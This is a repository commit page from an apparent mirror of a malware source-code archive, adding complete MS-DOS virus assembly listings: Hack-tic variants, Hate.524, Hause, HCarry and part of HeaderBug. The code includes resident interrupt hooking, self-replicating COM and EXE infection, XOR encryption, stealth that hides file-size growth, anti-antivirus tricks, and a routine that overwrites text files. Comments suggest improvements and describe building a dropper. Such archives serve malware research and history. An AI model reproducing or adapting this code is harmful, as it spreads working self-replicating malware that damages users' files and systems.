daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 23:39:23 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/H-Index/Virus.MSDOS.Unknown.hack-83.asm
+92
View File
@@ -0,0 +1,92 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
;THE FOLLOWING CODE MAKES THE VIRUS GO RESIDENT. TO KEEP THE INFECTION
;CODE AS SHORT AS POSSIBLE, THE INT 21 VECTOR (4 BYTES) IS SAVED OUTSIDE
;THE VIRUS BODY. THIS MAY OCCASIONALLY CAUSE THE VECTOR TO BE OVERWRITTEN
;BY THE ENVIRONMENT, WHICH WILL CRASH THE SYSTEM. TO PREVENT THIS, DEFINE
;TWO WORDS FOR THE LABEL INT21 AND ADD FOUR BYTES TO THE RESIDENT CODE.
;THE FIRST TIME THAT AN "INFECTED" FILE IS RUN, IT WILL SIMPLY RETURN TO
;DOS. THIS IS BECAUSE THE RESIDENT CODE MUST FIRST BE LOADED. AFTER THAT
;EVERYTHING WILL APPEAR TO WORK NORMALLY. TO REMEDY THIS PROBLEM, ALTER
;THE MEMORY CONTROL BLOCK TO TRAP THE RESIDENT CODE, THEN JUMP TO IT. A
;STILL BETTER SOLUTION IS TO COPY THE VIRUS TO THE TOP OF MEMORY AND
;TRAP IT THERE. ALSO, DO NOT REVECTOR INTERRUPT BUT OVERWRITE THE
;ENTRY POINT WITH A FAR JUMP TO THE VIRUS AND THEN RESTORE IT. THESE
;TECHNIQUES WILL MAKE A BETTER, THOUGH LONGER VIRUS.
;
start: mov ax,3521h ;GET INT 21 VECTOR
int 21h
mov di,offset int21
mov [di],bx ;SAVE IT
mov [di+2],es
mov dx,offset infect
mov ah,25h
int 21h ;REVECTOR TO VIRUS
mov dx,di
int 27h ;GO RESIDENT
;
;THIS IS THE ACTUAL INFECTION CODE. IT CHECKS FOR THE EXEC FUNCTION THEN
;TRIES TO RUN THE PROCESS AS AN EXE. IF THIS FAILS, THE VIRUS KNOWS THAT
;IT REALLY WAS A COM PROGRAM, IN WHICH CASE IT SIMPLY LETS THE CALL GO
;THROUGH. OTHERWISE A SHADOW COM FILE IS (RE)CREATED, "INFECTING" THE
;EXE. THE HIDDEN ATTRIBUTE IS SET ON THE SHADOW FILE. TO KEEP THESE FILES
;VISIBLE, SET CX TO 0 INSTEAD OF 2.
;NOTE: UNDER DOS 5.0, REGISTERS ES AND DS ARE SAME WHEN THE EXEC CALL
;IS ISSUED. SETTING ES TO DS IS ONLY NECESSARY TO MAKE THE VIRUS RUN UNDER
;DOS 3.X. OTHERWISE YOU CAN ELIMINATE THESE INSTRUCTIOS, BRINGING THE VIRUS
;BACK TO JUST 79 BYTES.
;
infect: cmp ax,4b00h ;EXEC?
jne interrupt ;IF NOT, CONTINUE INTERRUPT
push ax ;KEEP FUNCTION CALL
push es ;KEEP ES
push ds ;SET ES TO DS
pop es
mov di,dx ;SCAN TO EXT
mov al,'.'
repne scasb
push di ;POINTER TO EXT
mov ax,'XE' ;TRY TO RUN AS .EXE
stosw
stosb
pop di ;RETREIVE POINTER TO EXT
pop es ;RESTORE ES FOR EXEC
pop ax ;GET FUNCTION
push ax ;KEEP IT
push dx ;KEEP POINTER TO PROCESS NAME
pushf ;DO INTERRUPT
push cs
call interrupt
mov ax,'OC' ;CHANGE EXT TO COM
stosw
mov al,'M'
stosb
pop dx ;CLEAR STACK
pop ax
jc interrupt ;WASN'T .EXE SO JUST CONTINUE
mov cx,2
mov ah,3ch ;CREATE SHADOW .COM FILE
int 21h
xchg bx,ax ;GET HANDLE
push cs ;WRITE VIRUS TO .COM FILE
pop ds ;SEGMENT OF VIRUS CODE
mov cl,len
mov dx,si ;=0100 HEX
mov ah,40h ;WRITE VIRUS AND EXIT
;
interrupt:
db 0eah ;FAR JUMP
int21: ;VECTOR GOES HERE
;
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/H-Index/Virus.MSDOS.Unknown.hack-res.asm
+83
View File
@@ -0,0 +1,83 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
start: mov ax,9000h ;MOVE VIRUS CODE UP
mov es,ax
mov di,si
mov cx,len
rep movsb
mov ds,cx ;DS = 0
mov si,84h ;INT 21 VECTOR
mov di,offset int21
push di
mov dx,offset infect
lodsw ;SAVE ORIGINAL VECTOR
cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT
je exit
stosw
lodsw
stosw
push es
pop ds
mov ax,2521h ;REVECTOR TO VIRUS
int 21h
exit: push cs ;RESTORE SEGMENT REGISTERS
pop ds
push cs
pop es
pop si ;SI = END OF VIRUS CODE
mov di,0fch
push di ;RETURN HERE
mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS
stosw
mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS
stosw
mov ch,0feh
ret ;MOVE CODE AND RUN PROGRAM
;
infect: pushf
push ax
push cx
push dx
push si
push ds
cmp ah,40h ;WRITE FUNC?
jne done
cmp bx,1
je mes
mov si,dx ;DS:DX = WRITE BUFFER
lodsb
cmp al,0b8h ;ALREADY INFECTED?
je done
cmp al,0ebh ;PROBABLY .COM
jne done
mov cx,len ;LENGTH OF VIRUS
mov dh,1 ;DX ASSUMED TO BE 0
hack: push cs
pop ds
pushf
call cs:[int21] ;WRITE VIRUS
done: pop ds
pop si
pop dx
pop cx
pop ax
popf ;CONTINUE INTERRUPT
jmp cs:[int21]
mes: mov cx,12
mov dx,offset string
jmp short hack
string db ' (H*ck-tic) '
;
int21 dd 0c3h ;STANDALONE VIRUS RETURNS
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/H-Index/Virus.MSDOS.Unknown.hacktic.asm
+70
View File
@@ -0,0 +1,70 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
len equ offset last-100h
start: mov si,0100h
push si
mov ax,cs
add ah,10h
mov es,ax
xor di,di
mov cx,len
rep movsb
mov dx,0FE00h
mov ah,1Ah
int 21h
mov dx,offset file
mov ah,4Eh
jmp short find
retry: mov ah,3Eh
int 21h
mov ah,4Fh
find: push cs
pop ds
int 21h
mov cx,0FE1Eh
jc nofile
mov dx,cx
mov ax,3D02h
int 21h
xchg ax,bx
push es
pop ds
mov dx,di
mov ah,3Fh
int 21h
add ax,len
cmp byte ptr [di], 0BEh
je retry
push ax
xor cx,cx
mov ax,4200h
cwd
int 21h
pop cx
mov ah,40h
int 21h
jmp short retry
nofile: push cs
pop es
mov bl,0FCh
mov [bx],0AAACh
mov [bx+2],0FCE2h
pop di
push bx
ret
file db '*.COM',0
last db 0C3h
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/H-Index/Virus.MSDOS.Unknown.hacktic2.asm
+63
View File
@@ -0,0 +1,63 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset last-100h ;LENGTH OF VIRUS CODE
;
start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR
mov ah,4ah
int 21h
mov dx,es
add dh,10h
mov es,dx ;PROGRAM CODE WILL RUN HERE
push dx ;SET UP FOR FAR RETURN
push si
mov ah,26h ;CREATE NEW PSP
int 21h
mov di,si
mov si,offset last
push si
mov ch,0feh
rep movsb ;MOVE PROGRAM CODE UP
dec cx ;=FFFF
pop di
mov dx,offset file
mov ah,4eh ;FIND FIRST .COM FILE
jmp short find
retry: mov ah,4fh ;FIND NEXT
find: int 21h
jc nofile ;NO (MORE) FILES
mov dx,9eh ;FILE NAME IN DTA
mov ax,3d02h ;OPEN FILE
int 21h
xchg ax,bx ;1-BYTE MOVE OF AXBX
mov dx,di ;END OF VIRUS CODE
mov ah,3fh ;READ FILE DATA (CX=FFFF)
int 21h ;READ FILE AFTER VIRUS CODE
add ax,len ;LENGTH OF VIRUS+FILE
cmp byte ptr [di],0bbh ;CHECK IF ALREADY INFECTED
je retry ;TRY AGAIN
push ax
xor cx,cx
mov ax,4200h ;RESET FILE POINTER
cwd ;DX=0
int 21h
pop cx
mov dh,1
mov ah,40h ;WRITE INFECTED CODE BACK
int 21h
;
nofile: push es ;GO RUN PROGRAM
pop ds
retf
;
file db '*.COM',0 ;SEARCH FOR .COM FILES
last db 0c3h ;STANDALONE VIRUS CODE JUST RETURNS
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/H-Index/Virus.MSDOS.Unknown.hare.asm
+5548
View File
File diff suppressed because it is too large Load Diff
MSDOS/H-Index/Virus.MSDOS.Unknown.hate.asm
+299
View File
@@ -0,0 +1,299 @@
; Hate.524 (named by Moi because of Internal Text and Size)
; Uninteresting Encrypted COM Infector
; Source code compliments of PakiLad
p386n
seg000 segment byte public 'CODE' use16
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
start proc near
and al, 21h
mov ax, 5800h
int 21h ; Virus Installation Check
cmp ah, 58h ; Installed Already?
jnz InstallVirus ; No? Then JMP.
mov ah, 4Ch
int 21h ; Exit To DOS
InstallVirus:
call $+3
start endp
Next proc near
pop si
sub si, offset Next
mov dl, Cryptor[si]
cmp dl, 0
jz Crypted
mov cx, VirusSize
lea di, Crypted[si]
DecryptLoop:
mov al, [di]
xor al, dl
mov [di], al
inc di
loop DecryptLoop
Crypted:
mov ah, 14h
int 21h ; Install Check
cmp ah, 6 ; Installed?
jz RestoreCOM ; Yes? Then JMP.
jmp short DoInstall
RestoreCOM:
push cs
pop ds
mov ax, OrgByte1[si]
mov word ptr start, ax
mov ax, OrgByte2[si]
mov word ptr ds:102h, ax
mov al, OrgByte3[si]
mov byte ptr ds:104h, al
mov ax, offset start
push ax
retn ; Return to Original Program
DoInstall:
mov ah, 52h
int 21h ; Get List Of Lists
mov bx, es:[bx-2]
FindLastMCB:
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'Z' ; Last MCB?
jnz FindLastMCB ; No? Then JMP.
mov ax, es
mov es, bx
cmp byte ptr es:0, 'M' ; More MCB To Follow?
jz GotMoreMCB ; Yes? Then JMP.
mov es, ax ; ES points to MCB
jmp short GotMemory
GotMoreMCB:
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'M'
jz GotMoreMCB
GotMemory:
mov bx, es:3
mov ax, 795
mov cl, 4
shr ax, cl
sub bx, ax
mov es:3, bx
mov ax, es
add bx, ax
xor di, di
mov es, bx
mov cx, TotalSize+100h
push si
rep movsb ; Copy Virus Into Memory
pop si
push es
pop ds
mov ax, 3521h
int 21h ; Get Int 21h Vectors
mov Int21Ofs, bx
mov Int21Seg, es
mov ah, 25h
mov dx, offset NewInt21
int 21h ; Set New Int 21h Vectors
jmp RestoreCOM
Next endp
NewInt21: ; Install Check?
cmp ah, 14h
jnz CheckExecute ; No? Then JMP.
mov ah, 6 ; I'm Here!
iret
CheckExecute: ; Set Execution State?
cmp ah, 4Bh
jnz CheckFCBFind ; No? Then JMP.
jmp short InfectFile
CheckFCBFind: ; Find First File (FCB)?
cmp ah, 11h
jz FindFileFCB ; Yes? Then JMP.
cmp ah, 12h ; Find Next File (FCB)?
jnz DoOriginalFunc ; No? Then JMP.
FindFileFCB:
call CallInt21
pushf
pusha
push es
cmp al, 0 ; None found?
jnz NoFilesFound ; No? Then JMP.
mov ah, 2Fh
call CallInt21 ; Get DTA Segment/Offset
cmp byte ptr es:[bx], 0FFh ; Extended FCB?
jnz NotExtFCB ; No? Then JMP.
add bx, 7
NotExtFCB:
mov al, es:[bx+17h]
and al, 1Fh
cmp al, 1Fh ; Infected Already?
jnz NoFilesFound ; No? Then JMP.
sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize
NoFilesFound:
pop es
popa
popf
iret
DoOriginalFunc:
jmp short $+2
JMPFar21 db 0EAh
Int21Ofs dw 0
Int21Seg dw 0
InfectFile:
pusha
push es
push ds
mov ax, 3D02h
call CallInt21 ; Open File
jnb FileOpened ; No problems? Then JMP.
jmp CloseFile
FileOpened:
xchg ax, bx
push cs
pop ds ; DS = CS
mov ah, 3Fh
mov cx, 5
mov dx, offset OrgByte1
call CallInt21 ; Read In 5 Bytes
mov ax, OrgByte1
add ah, al
cmp ah, 0A7h ; Infected Already?
jnz NotBad1 ; No? Then JMP.
jmp CloseFile
NotBad1: ; Infected Already?
cmp ah, 45h
jnz NoSigFound ; No? Then JMP.
jmp CloseFile
NoSigFound:
mov ax, 5700h
call CallInt21 ; Get File Date/Time
push cx
push dx
and cx, 1Fh
cmp cx, 1Fh ; Infected Already?
jnz MovePtrEnd ; No? Then JMP.
pop dx
pop cx
jmp short CloseFile
MovePtrEnd:
mov ax, 4202h
xor cx, cx
cwd
call CallInt21 ; Move Pointer to End of File
sub ax, 3 ; Calculate JMP Offset
mov JMPOffset, ax
mov ah, 40h
mov cx, CryptSize
mov dx, offset start
call CallInt21 ; Write Crypt Routine to File
mov cx, VirusSize
mov si, offset Crypted
mov di, offset EndOfVirus
mov ax, 8F20h
push es
push ax
pop es
assume es:nothing
in al, 40h ; Get Random Number
xchg al, dl
mov Cryptor, dl
EncryptVirus:
mov al, [si]
xor al, dl
mov es:[di], al
inc si
inc di
loop EncryptVirus
mov cx, 1
EncryptSecond:
mov al, [si]
mov es:[di], al
inc si
inc di
loop EncryptSecond
pop es
assume es:nothing
push ds
mov ax, 8F20h
push ax
pop ds
assume ds:nothing
mov ah, 40h
mov cx, VirusSize2
mov dx, offset EndOfVirus
call CallInt21 ; Write Encrypted Virus To File
pop ds
assume ds:seg000
mov ax, 4200h
xor cx, cx
cwd
call CallInt21 ; Move Pointer to Beginning
mov ah, 40h
mov cl, 5
mov dx, offset InfMarker
call CallInt21 ; Write JMP And Infection Marker
pop dx
pop cx
or cx, 1Fh
mov ax, 5701h
call CallInt21 ; Fix File Date/Time
CloseFile:
mov ah, 3Eh
call CallInt21 ; Close File
pop ds
pop es
popa
jmp near ptr JMPFar21
CallInt21 proc near
pushf
call dword ptr cs:Int21Ofs
retn
CallInt21 endp
OrgByte1 dw 2124h
OrgByte2 dw 20CDh
OrgByte3 db 0
InfMarker dw 2124h
JMPInstruction db 0E9h
JMPOffset dw 0
VirusName db 'THIS IS [HATE V1.0] VIRUS$'
Cryptor db 0
EndOfVirus:
CryptSize equ Crypted - start
VirusSize equ Cryptor - Crypted
VirusSize2 equ $ - Crypted
TotalSize equ $ - start
seg000 ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hause.asm
+325
View File
@@ -0,0 +1,325 @@
_attr_ equ 0
_date_ equ 2
_time_ equ 4
fil equ 6
mov ax,4245h ;sepuku!
int 21h
jmp short jump1
db 'DY'
dy equ $-2-100h
_size dw offset total-100h
_ofs dw offset total
db 'McAfee, geht nach Hause! Wir sind unberwindlich!'
jump1:
mov ax,3521h
int 21h
mov old21[0],bx
mov old21[2],es
mov ax,cs
dec ax
mov ds,ax
lodsb
cmp byte [0],'Z'
jne bee_bloop_blap
cmp word ptr [0003h],pgf
jc bee_bloop_blap
sub word ptr [0003h],pgf
sub word ptr [0012h],pgf
mov es,[0012h]
mov si,110h
mov di,si
sub di,10h
mov cx,total-100h
rep movsb
push es
pop ds
cli
mov ax,2521h
mov dx,offset swansich
int 21h
sti
jmp 100h
bee_bloop_blap:
int 24h
int 20h
st21 db 0
vier:
mov al,0
iret
swansich:
pushf
cmp ax,4245h
jne not_sepuku
cmp word [dy+100h],'YD'
jne not_sepuku
popf
push bp
mov bp,sp
mov ds,[bp+4]
pop bp
mov si,word _ofs
mov cx,word _size
mov di,100h
push ds
pop es
cld
bam: rep movsb
pop ax
mov ax,100h
push ax
call zero_regs
iret
olr dw 0,0
not_sepuku:
cmp ah,40h
jne exec
cmp bx,5
jb exec
cmp cx,16
jl exec
call push_all
mov di,dx
add di,cx
dec di
mov al,[di]
mov bl,[di-1]
mov [di-1],al
mov [di],bl
call pop_all
exec:
cmp ax,4B00h ;exec
jne back
cmp cs:st21,0
jne back
mov cs:st21,1
call push_all
xchg si,dx
mov di,fil
push cs
pop es
mov cx,128
cld
rep movsb
call pop_all
popf
call o21
pushf
call push_all
mov ax,3524h
call o21
push bx
push es
mov ah,25h
push ds
push cs
pop ds
push dx
mov dx,offset vier
call o21
pop dx
pop ds
push cs
pop ds
mov dx,fil
mov ax,4300h
call o21
mov cs:[_attr_],cx
mov ax,4301h
xor cx,cx
call o21
jc err1
call infect
mov ax,4301h
mov cx,cs:[_attr_]
call o21
err1: pop ds
pop dx
mov ax,2524h
call o21
mov cs:st21,0
call pop_all
popf
retf 2
back: mov cs:st21,0
popf
jfa: db 0EAh
old21 dw 0,0
o21: pushf
call dword ptr cs:[old21]
ret
zero_regs:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
ret
jmp_to dw 0
push_all:
pop cs:[jmp_to]
push bp
push ds
push es
push di
push si
push dx
push cx
push bx
push ax
jmp cs:[jmp_to]
pop_all:
pop cs:[jmp_to]
pop ax
pop bx
pop cx
pop dx
pop si
pop di
pop es
pop ds
pop bp
jmp cs:[jmp_to]
;|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
; infection routine
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
infect:
pushf
call push_all
mov ax,3D02h
call o21
jnc open
i_back:
call pop_all
popf
ret
open:
xchg bx,ax
push cs
pop ds
push cs
pop es
mov ax,5700h
call o21
mov [_date_],dx
mov [_time_],cx
mov ah,3Fh
mov cx,offset total-100h
mov dx,offset total
call o21
jnc read1
jcls1: jmp close
read1: cmp ax,cx
jne jcls1
cmp word ptr [offset total],'ZM'
je jcls1
cmp byte ptr [offset total],'Z'
je jcls1
cmp word ptr [offset total+dy],'YD'
je jcls1
mov ax,4202h
xor cx,cx
xor dx,dx
call o21
jc jcls1
cmp dx,0
jne jcls1
cmp ah,0F1h
ja jcls1
add ax,100h
mov _ofs,ax
mov ah,40h
mov dx,offset total
mov cx,offset total-100h
call o21
jc jcls1
cmp ax,cx
jne jcls1
mov ax,4200h
xor cx,cx
xor dx,dx
call o21
mov ah,40h
mov cx,offset total-100h
mov dx,100h
call o21
and byte [_time_],255-31
or byte [_time_],29
close:
mov ax,5701h
mov cx,[_time_]
mov dx,[_date_]
call o21
mov ah,3Eh
call o21
jcls2: jmp i_back
db 'Demoralized Youth vous a eu'
total:
pgf equ $/16*2
db 'Í '

MSDOS/H-Index/Virus.MSDOS.Unknown.hcarry.asm
+137
View File
@@ -0,0 +1,137 @@
;This is the HCarry Virus
;dedicated to the late Harry Carry
;The only AV scanner that I know of that detects this virus is TBAV Scanner
start: ;start of virus!
lea si, crypt_start
mov di,si
mov cx,end - crypt_start
call crypt
jmp crypt_start
xor_value db 0
crypt:
lodsb
xor al,byte ptr [xor_value]
stosb
loop crypt
ret
crypt_start:
mov ah,9 ;print string to screen
lea dx,textmask
int 21h ;go do it dos!
mov ax,0fa02
push ax
mov bl,0
mov dx,05945
push dx
int 016
push cx
mov ah,4eh ;find first file
lea dx,filemask ;put the kind of file we want to find first in dx
xor cx,cx ;clears the cx register to 0
find_next: ;label for the find next rountine
int 21h ; go do it!
jnc infect ;jump if a file is found, if not continue jnc=jump
jmp text ;if carry flag isn't set
infect: ;here is our infect rountine, where we go when we find a file to kill
mov ax,3d02h ; open file for read/write access (00=read
;01=write 02=read/write)
mov dx, 9eh ;get file info
int 21h ;now!~
mov bx,ax ;move info form bx register in ax
in al,40h
mov byte ptr [xor_value],al
mov ah,40h
lea dx,start
mov cx,crypt_start - start
int 21h
lea si,crypt_start
lea di,end
mov cx,end - crypt_start
call crypt
mov ah,40h ;40hex write to file
mov cx,end - crypt_start ; heres the length of what we want to write
lea dx,end ;and heres where to start
int 21h ; go!
mov ah,3eh ;close the file up
int 21h ;now!
mov ah,4fh ;find next file!
jmp find_next ;continue!
text:
mov ah,4eh
lea dx,textfile
int 21h
jnc text_pload
jmp close
text_pload:
mov ax,3d02h
mov dx,9eh
int 21h
mov ah,40h
mov cx,pload_end - pload_start
lea dx,pload_start
int 21h
jmp text_findnext
text_findnext:
mov ah,4fh
int 21h
jnc text_pload
jmp close
pload_start:
db 'HOLY COW!',10,13,
db '---',10,13,
db 'Whats your favorite planet?...Mines the SUN!',10,13,
db 'One time i studied it for a whole hour i almost went BLIND!',10,13,
db '---',10,13,
db 'Hey!....Whats goin.....Hey!',10,13,
db '---',10,13,
db 'Now just for some silly crap!',10,13,
db 'FLOCK!',10,13,
db 'Hehehehe Look At YOU!',10,13,
db 'Back to the Computer Store for you!',10,13,
db 'This is HORRRIBLE!'
db 'Who would do something like this?',10,13,
db 'MY LEG DOESNT BEND THAT WAY!',10,13,
db 'MOCB',10,13,
db 'This Virus has infected this file if you havnt found that out yet!',10,13,
db 'Please insert 25 cents!',10,13,
db 'DO DO DO Were Sorry your call did not go threw please hang up and try again',10,13,
db 'JERRY JERRY JERRY JERRY JERRY JERRY',10,13,
db 'Jerry Springer to HOT for Television',10,13,
db 'DOH!',10,13,
pload_end:
close:
int 20h ;exit program
;this next portion is the datasegment which the virus refers to for
;the variable we give it
;Thank you to Spo0ky,<-OPIC->,and Arsonic for helping me!
textfile db '*.txt',0 ;find .txt files
filemask db '*.com',0 ;the kinds of files we want
textmask db 'This file is now infected!',10,13,
db 'By The HCarry virus!',10,13,
db 'MoCBDUKE[Codebreaker, 1998]',10,13,'$'
end:
MSDOS/H-Index/Virus.MSDOS.Unknown.headbug.a86
+288
View File
@@ -0,0 +1,288 @@
;=============================================================================
; Virus Name: HeaderBug
; Effective Length: 324 Bytes (no increase in file length)
;
; Notes:
; - resident, BIOS-level-stealth .EXE header infector
; - undetectable by any current A-V scanner even w/o stealth
; - infects SMARTDRV.EXE to ensure residency at each boot
; - infects .EXE header sectors whenever accessed for write
; OR read (during reads only if A-V monitor is not
; resident)
; - As a result, will infect every target .EXE file during
; even such operations as a fixed disk DEFRAG
; - successfully infects Windows .EXE files without
; detection even when 32-bit file access is in use
; - does not decrease available memory
; - no harmful payload
;
; To Compile:
; - use shareware A86 assembler
; - type "a86 headbug.a86"
; - resulting headbug.com is actually an .exe file.
; It is a virus dropper which, if executed, will infect
; your system with HeaderBug
;=============================================================================
start_offset equ 07d*4-1
res_offset equ start_offset-01a0
com_offset equ 0100
header_offset equ 01a0
infect_tag equ 0c033
setver_tag equ 0d4a
viruslength equ 0144
old_code_length equ 012
EH_Signature dw 'ZM' ;set to 'MZ' or 'ZM' for .exe files
EH_Modulo dw 0000 ;remainder of file size/512
EH_Size dw 0012 ;file size/512
EH_Reloc dw 0000 ;6 ;number of relocation items
EH_Size_Header dw 000a ;8 ;size of header in paragraphs
EH_Min_Mem dw 0240 ;minimum paragraphs needed by file
EH_Max_Mem dw 0240 ;maximum paragraphs needed by file
EH_SS dw 0240 ;stack segment displacement
EH_SP dw ? ;stack pointer
EH_Checksum dw ? ;checksum, not used
EH_IP dw 0000 ;14 ;instruction Pointer of Exe file
EH_CS dw 0000 ;16 ;code segment displacement of .exe
EH_1st_reloc dw ? ;first relocation item
EH_ovl dw ? ;overlay number
db 084 dup ? ;pad rest of header w/dummy bytes
;-----------------------------------------------------------------------------
; Header_entry - Tests interrupt vector table for room and if there is room,
; installs virus in unused area of interrupt table. Read and write disk
; cache on all drives are disabled (prevents infection problems), SMARTDRV
; infected in default directory to ensure that virus becomes resident on each
; boot and that SMARTDRV's disk cache is never installed. SMARTDRV is
; infected through read-file action (not write) by installed int13 routine.
;-----------------------------------------------------------------------------
header_entry:
xor ax,ax ;set ax=0
mov ds,ax ;set ds=ax
mov es,ax ;set es=ax
dec ax ;set ax=ffffh as flag for zero_test
mov si,start_offset ;set si to start address in INT table
push si ;save value for later use
call zero_test ;check for clear area in INT table
pop di ;set destination offset to INT table
jc exit_header ;if area not clear, exit, don't install
xor si,si ;set source offset to virus start
call move_it ;move virus to empty space in INT table
mov di,offset old13+res_offset ;set destination for int13
mov si,013*04 ;set source for int13 vector
push si ;save value for later use
movsw ;copy int13 vector
movsw
pop di ;set destination for new value
mov ax,offset int13+res_offset ;virus int13 routine offset
stosw ;store new offset in int13
xor ax,ax ;virus int13 routine segment
stosw ;steal int13
mov bx,03 ;value required for STATUS call
mov bp,05 ;set max. number of drives
kill_cache:
mov ax,04a10 ;SMARTDRV STATUS function
push ax ;save it for later use
mov dl,02 ;turn off drive's read buffer
int 02f ;do it
pop ax ;restore ax
mov dl,04 ;turn off drive's write buffer
int 02f ;do it
dec bp ;decrement drive number
jns kill_cache ;if drive number >=0, repeat process
push cs
pop ds ;set ds=cs
mov ax,03d00 ;open file w/handle
mov dx,offset filename-header_offset ;point to filename
int 021 ;do it
jc exit_header ;if flag=fail, exit
mov bx,ax ;save handle
mov ah,03f ;read file w/handle
mov ch,02 ;read 200h bytes (header sector)
mov dh,02 ;point to buffer area beyond virus
int 021 ;do it (infect SMARTDRV.EXE header)
mov ah,03e ;close file w/handle
int 021 ;do it
exit_header:
mov ah,04c ;terminate with return code
int 021 ;do it
filename: db 'C:\DOS\SMARTDRV.EXE',0 ;file to initially infect
;-----------------------------------------------------------------------------
; Int13 - On any read or write, checks sector for .EXE header characteristic.
; Checks for word found in header of SETVER.EXE to prevent infection and
; resulting problems (lockup) when an infected SETVER is loaded from default
; CONFIG.SYS. If sector is being read, checks for infection then checks for
; presence of A-V monitor before infecting. If sector is being written, only
; checks for SETVER header, since stealth on prior int13 would hide previous
; infection and since any A-V monitor would expect a write action. In both
; read or write cases, sector is restored to appear identical to pre-infection
; before buffer containing .EXE header is presented to calling program. Name
; of virus stored in area of interrupt table used by TBDriver vectors in
; order to prevent system crash if TBDriver is loaded after virus is resident.
;-----------------------------------------------------------------------------
int13:
push cx ;preserve registers
push si
push di
push ds
push es
pop ds ;set ds=es
